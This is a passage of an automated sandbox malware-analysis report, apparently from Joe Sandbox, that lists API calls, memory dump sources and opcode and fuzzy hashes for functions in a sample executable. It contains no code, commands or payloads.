                                                                                                    • Instruction Fuzzy Hash: 86D11672B08A81C9E714DF79E4802AC77B2FB54798BA44236CE5E97F99DE38D416C310
                                                                                                    APIs
                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC38C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691BC25B), ref: 00007FF7691BC417
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorLastMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 953036326-0
                                                                                                    • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                    • Instruction ID: bed1e4dd73bf7a8061988640a79e5398d00ae7535076ccc8f4a81f5cab03360c
                                                                                                    • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                    • Instruction Fuzzy Hash: C991C572F08651C5FB59AF69B4802BDABB2BB44B88FB44135DE0E57A98CE3CD541C720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID:
                                                                                                    • API String ID: 2943138195-0
                                                                                                    • Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                                                                    • Instruction ID: 68a3f2cb711c9ae72f837340675bf5e742689cb66336fdd4900695039c10b6d8
                                                                                                    • Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                                                                    • Instruction Fuzzy Hash: 69916772E08F568DFB118BA2D8403AC27B1BB24728F5445B6DE6D276B5DF38A845C348
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_isindst
                                                                                                    • String ID:
                                                                                                    • API String ID: 4170891091-0
                                                                                                    • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                    • Instruction ID: 0fbb5a587e336ef0e799c31d086331183f82f415faa418549c9ef691f0623293
                                                                                                    • Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                                                                    • Instruction Fuzzy Hash: E451D672F04112CAEB1CEF64EA556BCA7B2AB14359FA00135DD1E52AE9DF3CA502C750
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                    • String ID:
                                                                                                    • API String ID: 168861036-0
                                                                                                    • Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                                                                    • Instruction ID: f72f27fe1bb595bc25a2283e8b9428dc5127ac2f844e347d5a14aa7f1bd05160
                                                                                                    • Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                                                                    • Instruction Fuzzy Hash: B0517772A18E568CF7108FA2E8403BD37B0BB64768F544171DA6E276A6DF38E442C348
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                    • String ID:
                                                                                                    • API String ID: 2780335769-0
                                                                                                    • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                    • Instruction ID: 3b67deaf55b2bf900068082c1cd07fe594c5191187d35b6648dc90dcc298683b
                                                                                                    • Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                                                                    • Instruction Fuzzy Hash: 9B517C22A08651CAFB18EF71E5503BDA3B2EB48B58FA48535DE0987689DF3CD481C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID:
                                                                                                    • API String ID: 2943138195-0
                                                                                                    • Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                                                                    • Instruction ID: 0d00968080e08e1589846c03c6b09c29e226ba526c4fe013e151c90ca738453b
                                                                                                    • Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                                                                    • Instruction Fuzzy Hash: E6417772A08B85CDFB01CF69D8413AC37B0BB64B68F548065DE9D6B7AACF389841C314
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 1956198572-0
                                                                                                    • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                    • Instruction ID: dcba193661712412712dde0f1e64ee6958b8336f32026eab4c405f1ba52e37fb
                                                                                                    • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                    • Instruction Fuzzy Hash: F911A921F08142C2FA5DAF6AF64427992B1EF88B80FE49531DE4947F9DCD2CD8C6C624
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2933794660-0
                                                                                                    • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                    • Instruction ID: 2763cde2e460d71811b8eedc28c28b4342dc5aec1f1af08169427ca340403f09
                                                                                                    • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                    • Instruction Fuzzy Hash: 3D114C22B14B05CAEB009F60F8442B873B4FB59758F840E31DA2D86BA4DF7CE158C750
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                    • String ID: ?
                                                                                                    • API String ID: 1286766494-1684325040
                                                                                                    • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                    • Instruction ID: 1bf283dd3ee79d78002088e2a418766c89ac584c6f21bf7504ce18dd8197fdbb
                                                                                                    • Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                    • Instruction Fuzzy Hash: 1E41D512B0C682C6FB28AF25B501779E770EB91BA4FA44235EE5D07AD9DF3CD4418B10
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$CreateFrameInfo
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2697087660-1018135373
                                                                                                    • Opcode ID: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                                                                    • Instruction ID: 919e8aa3b6901c1d50e231208a195f6a5a3f081d24c5099668df340230c58bae
                                                                                                    • Opcode Fuzzy Hash: f6943bea1c78c8542bb5a279c29cdd6a6ec40214996e776607272464948ef889
                                                                                                    • Instruction Fuzzy Hash: 46515137A18B818AD660DF1AE04026E77A4FB98BB0F140575EB9D17B65CF3CE4A1CB04
                                                                                                    APIs
                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B835E
                                                                                                      • Part of subcall function 00007FF7691B9C58: HeapFree.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
                                                                                                      • Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78
                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7691ABEC5), ref: 00007FF7691B837C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                    • String ID: C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                    • API String ID: 3580290477-3782499776
                                                                                                    • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                    • Instruction ID: 8ec0a577db9cf52c414b7e13bce90e6b4b47b3d0aa1467e576bbd5d2d877450a
                                                                                                    • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                    • Instruction Fuzzy Hash: 05416036A08B52C6E719FF25F4911BCB3B6EB45B94FA54035EA4E43B99DE3CD4418320
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                    • String ID: .$:
                                                                                                    • API String ID: 2020911589-4202072812
                                                                                                    • Opcode ID: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
                                                                                                    • Instruction ID: b54f97da19a92e2e943bc31fb2dd757af3d90c5cbf48a949b5ab0268f2b09081
                                                                                                    • Opcode Fuzzy Hash: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
                                                                                                    • Instruction Fuzzy Hash: 38416026F08752D8FB14FFB1A8501BC6675AF14758FA40039EE5D67B8DDF38A4469320
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                    • Instruction ID: c3cd2968c8eb6ef4574f38d2bf459be36a180e7b9a29f56cbc44d6714322a635
                                                                                                    • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                    • Instruction Fuzzy Hash: 7A41A422B18A85C5EB24AF25F4443AAB771FB98794FA44035EE4D87B98DF3CD441CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: void$void
                                                                                                    • API String ID: 2943138195-3746155364
                                                                                                    • Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                                                                    • Instruction ID: a37da0e49650a488879deb7964826683de3cfa9f538fca6dc6695bef70018f46
                                                                                                    • Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                                                                    • Instruction Fuzzy Hash: 62313572E18E558CFB00CBA6E8410EC37B4BB68768B440576EE6E62B79DF389144C758
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID: :
                                                                                                    • API String ID: 1611563598-336475711
                                                                                                    • Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                    • Instruction ID: 5dc2ea9728abb61aef2ae4b63c10a72cfd873f7b20e709e1f2465431cfeb90c0
                                                                                                    • Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                                                                    • Instruction Fuzzy Hash: 3B21B622B08681C1EB68AF15E04427DF3B2FB84B84FE54135D68D43688DF7CDA49CBA1
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHeader$ExceptionRaise
                                                                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                    • API String ID: 3685223789-3176238549
                                                                                                    • Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                                                                    • Instruction ID: 5676251dcfaaf0ff1e4969d08f90b9d8dc97fa009be29380f15cbde4cbb1a734
                                                                                                    • Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                                                                    • Instruction Fuzzy Hash: AB01B161A2DE06D9EE40CB16E8501BC6320FFB0BB4F8050B1D56E176BAEF6CD404C308
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                    • Instruction ID: 94ce0bdcc1f81004d8b6861d16c18a4ddd6435a2bb7dcabd40a7b74d59a568f4
                                                                                                    • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                    • Instruction Fuzzy Hash: 30114936618B84C2EB659F25F540269B7E5FB88B84FA84230DA8D07B68DF3CD951CB00
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                    • Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                                                                    • Instruction ID: f938d593274e148220e9ee312fd72cffeb749a250c4e82f66e1445d53bb129da
                                                                                                    • Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                                                                    • Instruction Fuzzy Hash: 14118F32A08F8182EB518F16F44026DB7A4FB98BA4F684270DE9D17B69DF3CC551C704
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
